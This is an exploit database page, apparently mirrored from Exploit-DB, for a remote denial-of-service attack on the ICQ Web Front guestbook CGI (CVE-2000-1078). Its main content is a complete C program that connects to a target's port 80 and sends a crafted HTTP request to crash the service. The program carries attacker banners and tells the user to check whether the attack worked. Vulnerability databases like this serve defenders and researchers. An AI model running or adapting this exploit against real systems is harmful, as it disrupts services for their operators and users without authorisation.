Lucene search
+L

Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service

🗓️ 10 Mar 2000 00:00:00Reported by Charles ChearType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Remote Denial of Service vulnerability in ICQ Web Front using long URL parameter to crash service.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-1078
29 Nov 200005:00
cve
Cvelist
CVE-2000-1078
29 Nov 200005:00
cvelist
EUVD
EUVD-2000-1064
7 Oct 202500:30
euvd
Tenable Nessus
ICQ Web Front Service guestbook.cgi DoS
15 Mar 200000:00
nessus
NVD
CVE-2000-1078
11 Dec 200005:00
nvd
// source: https://www.securityfocus.com/bid/1463/info

The guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter.

/* ICQ Web Front DoS */

#include <sys/socket.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>

void main(int argc, char *argv[])
{
  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long start;
  unsigned long end;
  unsigned long counter;

  /* added extra ? to be on the safe side :) */
  char xploitstr1[50]="GET /?????????? HTTP/1.0 \n\n";


  printf("ICQ Web Front DoS - author: char0hlz/tPG\n");
  printf("The Poor Gurus' Network [http://www.tpgn.net]\n");

  if (argc<2)
  {
    printf("usage: %s <hostname>\n", argv[0]);
    exit(0);
  }
  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }
    start=inet_addr(argv[1]);
    counter=ntohl(start);
    sock=socket(AF_INET,SOCK_STREAM,0);
    bcopy(he->h_addr,(char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0)
    {
      perror("pr0blemz");
    }
    send(sock,xploitstr1,strlen(xploitstr1),0);
    close(sock);

   printf("Done. Refresh the page to see if it worked.\n");
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2012 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
EPSS0.0521
33